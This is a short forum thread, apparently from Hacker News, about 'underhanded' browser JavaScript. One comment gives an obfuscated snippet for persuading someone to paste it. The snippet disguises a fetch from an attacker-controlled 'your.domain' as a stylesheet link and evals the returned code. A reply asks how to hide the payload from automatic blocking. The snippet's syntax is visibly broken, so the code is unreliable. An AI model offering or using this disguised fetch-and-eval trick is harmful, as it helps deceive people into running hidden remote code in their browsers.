|
|
|
|
|
|
by zachrose
4008 days ago
|
|
|
Assuming this is JavaScript in a browser, I guess it depends on who you're trying to fool. It sounds like your going for obfuscated or "underhanded" code. Just messing around, here's something you might try. You might convince someone to paste in a CSS link and an obscure but short snippet of JavaScript. (Okay!) Then: <link rel="stylesheet" href="//your.domain/style.css" id="ok"></link>
<script>var s = function(k){return k.split('')};
var obj = Object.keys({value:3}).map(s);
fetch(document.getElementById('ok').href+"?x").then(r){r.text().then(window[obj[0].pop().concat(obj[0].join('')).split('');s.pop();
s.join('');]})</script>
Serve a stylesheet at your.domain/style.css and serve JavaScript at your.domain/style.css?x. The JS here will fetch that as text and eval it. |
|
|
My assumption is that i am in control of both (a) and (b) so i can mess around with the output of (b) to have all of (a) within itself.
The problem is how to best inject (a) inside (b), without using any 3rd party resources, which could be blocked automatically